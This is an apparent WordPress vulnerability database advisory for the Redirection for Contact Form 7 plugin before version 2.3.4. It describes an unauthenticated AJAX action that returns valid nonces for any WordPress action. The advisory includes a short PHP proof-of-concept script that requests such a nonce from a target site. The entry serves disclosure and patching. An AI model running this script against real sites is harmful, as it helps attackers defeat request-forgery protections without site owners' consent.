WordPress Plugin Vulnerabilities
Redirection for Contact Form 7 < 2.3.4 - Unauthenticated Arbitrary Nonce Generation
Description
In the plugin, unauthenticated users can use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function.
Proof of Concept
<?php // Settings $wp_url = $argv[1]; // Get nonce $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php'); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ 'action' => 'wpcf7r_get_nonce', 'param' => '[ANY ACTION HERE]' ]); $output = curl_exec($ch); curl_close($ch); print_r($output); ?>
Affects Plugins
Fixed in version 2.3.4
References
Classification
Miscellaneous
Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-04-20 (about 1 years ago)
Added
2021-04-20 (about 1 years ago)
Last Updated
2021-04-21 (about 1 years ago)